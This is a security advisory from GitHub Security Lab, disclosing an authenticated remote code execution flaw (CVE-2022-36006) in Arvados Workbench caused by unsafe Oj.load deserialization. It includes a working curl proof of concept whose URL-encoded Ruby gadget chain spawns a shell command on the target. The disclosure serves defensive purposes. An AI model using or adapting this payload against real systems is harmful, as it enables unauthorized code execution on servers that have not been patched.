GHSL-2022-063: Remote Code Execution (RCE) in Arvados Workbench - CVE-2022-36006

Coordinated Disclosure Timeline

• 2022-08-03: Sent report to Arvados maintainers
• 2022-08-03: Arvados maintainers acknowledged receiving the report
• 2022-08-12: Advisory was published

Summary

A remote code execution (RCE) vulnerability in the Arvados Workbench allowed authenticated attackers to execute arbitrary code via specially crafted JSON payloads.

Product

Arvados Workbench

Tested Version

2.3.3

Details

Issue: Authenticated remote code execution due to insecure deserialization (GHSL-2022-063)

The Arvados Workbench uses Oj for deserializing JSON payloads from remote sources. When Oj.load is used without a restricting mode, arbitrary Ruby objects can be deserialized. Deserializing untrusted data using any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, allows an attacker to execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.

The Arvados Workbench exposes a search endpoint which uses Oj.load to deserialize a JSON based filter query parameter. Authenticated attackers able to send arbitrary requests to this endpoint will be able to achieve remote code execution (RCE). The same is likely true for the combine_selected_files_into_collection action inside of actions_controller.rb.

This vulnerability was found using a CodeQL query which identifies deserialization of user-controlled data.

Proof of concept (for Ruby 2.x)

The search endpoint can be attacked with the following deserialization gadget chain which creates the file /tmp/pwned.txt on the attacked Arvados system (the test was performed against a setup as described on the Arvados-in-a-box page):

curl -i -s -k -X $'GET' \
    -H $'Host: 172.17.0.2'-H $'Accept: application/json' -H $'X-Csrf-Token: [..] \
    -b $'_arvados_workbench_session=[..]' \
    $'https://172.17.0.2/search/choose?partial=true&filters=%7B%22%5E%231%22%3A%5B%5B%7B%22%5Ec%22%3A%22Gem%3A%3ASpecFetcher%22%7D%2C%7B%22%5Ec%22%3A%22Gem%3A%3AInstaller%22%7D%2C%7B%22%5Eo%22%3A%22Gem%3A%3ARequirement%22%2C%22requirements%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Net%3A%3ABufferedIO%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%3A%3AEntry%22%2C%22read%22%3A0%2C%22header%22%3A%22any%22%7D%2C%22debug%5Foutput%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3ARequestSet%22%2C%22sets%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Ec%22%3A%22Kernel%22%7D%2C%22method%5Fid%22%3A%22%3Aspawn%22%7D%2C%22git%5Fset%22%3A%22date%20%3E%3E%20%2Ftmp%2Fpwned%2Etxt%22%7D%2C%22method%5Fid%22%3A%22%3Aresolve%22%7D%7D%7D%7D%5D%2C%22any%22%5D%7D'

(Hint: replace the X-Csrf-Token header and the _arvados_workbench_session cookie with valid (authenticated) values)

Please note:

• The above payload for Ruby 2.x is based on a gadget chain for Marshal.load originally discovered by William Bowling aka vakzz.
• A payload for Oj.load such as the one above can be found in this blog post from Bishop Fox.
• We are in possession of an undisclosed Oj.load payload for Ruby 3.x, that is based on the newest Marshal.load gadget chain from William Bowling.

Impact

This issue may lead to Remote Code Execution (RCE)

CVE

• CVE-2022-36006

Credit

This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-063 in any communication regarding this issue.